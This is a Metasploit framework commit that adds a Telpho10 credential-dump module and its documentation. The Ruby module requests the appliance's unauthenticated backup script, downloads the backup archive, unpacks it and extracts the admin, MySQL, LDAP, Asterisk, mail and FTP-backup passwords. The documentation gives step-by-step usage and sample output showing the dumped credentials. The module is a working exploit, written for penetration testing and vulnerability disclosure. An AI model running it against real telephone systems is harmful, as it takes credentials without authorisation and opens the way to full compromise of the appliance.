Land rapid7#7484, Add Telpho10 Credentials Dump Exploit

pbarry-r7 · pbarry-r7 · commit 5c12d55c8413 · 2016-10-28T17:41:46.000-05:00
diff --git a/documentation/modules/auxiliary/admin/http/telpho10_credential_dump.md b/documentation/modules/auxiliary/admin/http/telpho10_credential_dump.md
@@ -0,0 +1,132 @@
+## Vulnerable Application
+
+  Telpho10 v2.6.31 (32-bit Linux ISO image download [here](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso)).
+
+  Supporting documentation for this product can be found [here](http://www.telpho.de/downloads.php).
+
+## Verification Steps
+
+  The following steps will allow you to install and dump the credentials from a Telpho10 instance:
+
+  1. Download the [Telpho10 ISO image](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso) and install in a VM (or on a system)
+    - note that the ISO will default to a German keyboard layout
+  1. configure the Telpho10's IP address
+    - edit /etc/networks/interfaces accordingly
+  1. Start msfconsole
+  1. Do: ```use auxiliary/admin/http/telpho10_credential_dump```
+  1. Do: ```set RHOST <IP address of your Telpho10 instance> ```
+  1. Do: ```run```
+  1. You should see a list of the retrieved Telpho10 credentials
+
+## Scenarios
+
+  Example output when using this against a Telpho10 v2.6.31 VM:
+
+  ```
+$ ./msfconsole
+                                                  
+# cowsay++
+ ____________
+< metasploit >
+ ------------
+       \   ,__,
+        \  (oo)____
+           (__)    )\
+              ||--|| *
+
+
+       =[ metasploit v4.12.36-dev-16fc6c1                 ]
++ -- --=[ 1596 exploits - 908 auxiliary - 273 post        ]
++ -- --=[ 458 payloads - 39 encoders - 8 nops             ]
++ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
+
+msf > use auxiliary/admin/http/telpho10_credential_dump
+msf auxiliary(telpho10_credential_dump) > set RHOST 10.0.2.35
+RHOST => 10.0.2.35
+msf auxiliary(telpho10_credential_dump) > run
+
+[*] Generating backup
+[*] Downloading backup
+[+] File saved in: /home/pbarry/.msf4/loot/20161028155202_default_10.0.2.35_telpho10.backup_185682.tar
+[*] Dumping credentials
+
+[*] Login (/telpho/login.php)
+[*] -------------------------
+[+] Username: admin
+[+] Password: telpho
+
+[*] MySQL (/phpmyadmin)
+[*] -------------------
+[+] Username: root
+[+] Password: telpho
+
+[*] LDAP (/phpldapadmin)
+[*] --------------------
+[+] Username: cn=admin,dc=localdomain
+[+] Password: telpho
+
+[*] Asterisk MI (port 5038)
+[*] -----------------------
+[+] Username: telpho
+[+] Password: telpho
+
+[*] Mail configuration
+[*] ------------------
+[+] Mailserver: 
+[+] Username:   
+[+] Password:   
+[+] Mail from:  
+
+[*] Online Backup
+[*] -------------
+[+] ID:       
+[+] Password: 
+
+[*] Auxiliary module execution completed
+msf auxiliary(telpho10_credential_dump) > 
+```
+
+I navigated my browser to the admin page of the UI and changed some of the password values, then ran the module again to verify I see the updated values:
+
+```
+msf auxiliary(telpho10_credential_dump) > run
+
+[*] Generating backup
+[*] Downloading backup
+[+] File saved in: /home/pbarry/.msf4/loot/20161028161929_default_10.0.2.35_telpho10.backup_044262.tar
+[*] Dumping credentials
+
+[*] Login (/telpho/login.php)
+[*] -------------------------
+[+] Username: admin
+[+] Password: s3cr3t
+
+[*] MySQL (/phpmyadmin)
+[*] -------------------
+[+] Username: root
+[+] Password: telpho
+
+[*] LDAP (/phpldapadmin)
+[*] --------------------
+[+] Username: cn=admin,dc=localdomain
+[+] Password: ldaps3cr3t
+
+[*] Asterisk MI (port 5038)
+[*] -----------------------
+[+] Username: telpho
+[+] Password: asterisks3cr3t
+
+[*] Mail configuration
+[*] ------------------
+[+] Mailserver: 
+[+] Username:   
+[+] Password:   
+[+] Mail from:  
+
+[*] Online Backup
+[*] -------------
+[+] ID:       
+[+] Password: 
+
+[*] Auxiliary module execution completed 
+  ```
diff --git a/modules/auxiliary/admin/http/telpho10_credential_dump.rb b/modules/auxiliary/admin/http/telpho10_credential_dump.rb
@@ -0,0 +1,159 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rubygems/package'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Telpho10 Backup Credentials Dumper',
+      'Description'    => %q{
+        This module exploits a vulnerability found in Telpho10 telephone system
+        appliance. This module generates a configuration backup of Telpho10,
+        downloads the file and dumps the credentials for admin login,
+        phpmyadmin, phpldapadmin, etc.
+        This module has been successfully tested on the appliance.
+      },
+      'Author'         => 'Jan Rude', # Vulnerability Discovery and Metasploit Module
+      'License'        => MSF_LICENSE,
+      'References'     => ['URL', 'https://github.com/whoot/TelpOWN'],
+      'Platform'       => 'linux',
+      'Targets'        =>
+        [
+          ['Telpho10 <= 2.6.31', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Sep 2 2016'))
+
+      register_options(
+        [
+          Opt::RPORT(80)
+        ], self.class)
+  end
+
+  # Used for unpacking backup files
+  def untar(tarfile)
+    destination = tarfile.split('.tar').first
+    FileUtils.mkdir_p(destination)
+    File.open(tarfile, 'rb') do |file|
+      Gem::Package::TarReader.new(file) do |tar|
+        tar.each do |entry|
+          dest = File.join destination, entry.full_name
+          if entry.file?
+            File.open(dest, 'wb') do |f|
+              f.write(entry.read)
+            end
+            File.chmod(entry.header.mode, dest)
+          end
+        end
+      end
+    end
+    return destination
+  end
+
+  # search for credentials in backup file
+  def dump_creds(mysql_file)
+    file = File.new(mysql_file, 'r')
+    while (line = file.gets)
+      if line.include? 'adminusername'
+        config = [line]
+      end
+    end
+    file.close
+
+    print_status('Login (/telpho/login.php)')
+    print_status('-------------------------')
+    print_good("Username: #{config.first[/adminusername\',\'(.*?)\'/, 1]}")
+    print_good("Password: #{config.first[/adminpassword\',\'(.*?)\'/, 1]}\n")
+
+    print_status('MySQL (/phpmyadmin)')
+    print_status('-------------------')
+    print_good('Username: root')
+    print_good("Password: #{config.first[/dbpassword\',\'(.*?)\'/, 1]}\n")
+
+    print_status('LDAP (/phpldapadmin)')
+    print_status('--------------------')
+    print_good('Username: cn=admin,dc=localdomain')
+    print_good("Password: #{config.first[/ldappassword\',\'(.*?)\'/, 1]}\n")
+
+    print_status('Asterisk MI (port 5038)')
+    print_status('-----------------------')
+    print_good("Username: #{config.first[/manageruser\',\'(.*?)\'/, 1]}")
+    print_good("Password: #{config.first[/managersecret\',\'(.*?)\'/, 1]}\n")
+
+    print_status('Mail configuration')
+    print_status('------------------')
+    print_good("Mailserver: #{config.first[/ipsmarthost\',\'(.*?)\'/, 1]}")
+    print_good("Username:   #{config.first[/mailusername\',\'(.*?)\'/, 1]}")
+    print_good("Password:   #{config.first[/mailpassword\',\'(.*?)\'/, 1]}")
+    print_good("Mail from:  #{config.first[/mailfrom\',\'(.*?)\'/, 1]}\n")
+
+    print_status('Online Backup')
+    print_status('-------------')
+    print_good("ID:       #{config.first[/ftpbackupid\',\'(.*?)\'/, 1]}")
+    print_good("Password: #{config.first[/ftpbackuppw\',\'(.*?)\'/, 1]}\n")
+
+  end
+
+  def run
+    res = send_request_cgi({
+      'uri'  => '/telpho/system/backup.php',
+      'method' => 'GET'
+    })
+    if res && res.code == 200
+      print_status('Generating backup')
+      sleep(1)
+    else
+      print_error("Could not find vulnerable script. Aborting.")
+      return nil
+    end
+
+    print_status('Downloading backup')
+    res = send_request_cgi({
+      'uri'    => '/telpho/temp/telpho10.epb',
+      'method' => 'GET'
+    })
+    if res && res.code == 200
+      if res.body.to_s.bytesize == 0
+        print_error('0 bytes returned, file does not exist or is empty.')
+        return nil
+      end
+
+      path = store_loot(
+        'telpho10.backup',
+        'application/x-compressed',
+        datastore['RHOST'],
+        res.body,
+        'backup.tar'
+      )
+      print_good("File saved in: #{path}")
+
+      begin
+        extracted = untar("#{path}")
+        mysql = untar("#{extracted}/mysql.tar")
+      rescue
+        print_error('Could not unpack files.')
+        return nil
+      end
+      begin
+        print_status("Dumping credentials\n")
+        dump_creds("#{mysql}/mysql.epb")
+      rescue
+        print_error('Could not find credential file.')
+        return nil
+      end
+    else
+      print_error('Failed to download backup file.')
+      return nil
+    end
+  rescue ::Rex::ConnectionError
+    print_error("#{rhost}:#{rport} - Failed to connect")
+    return nil
+  end
+end
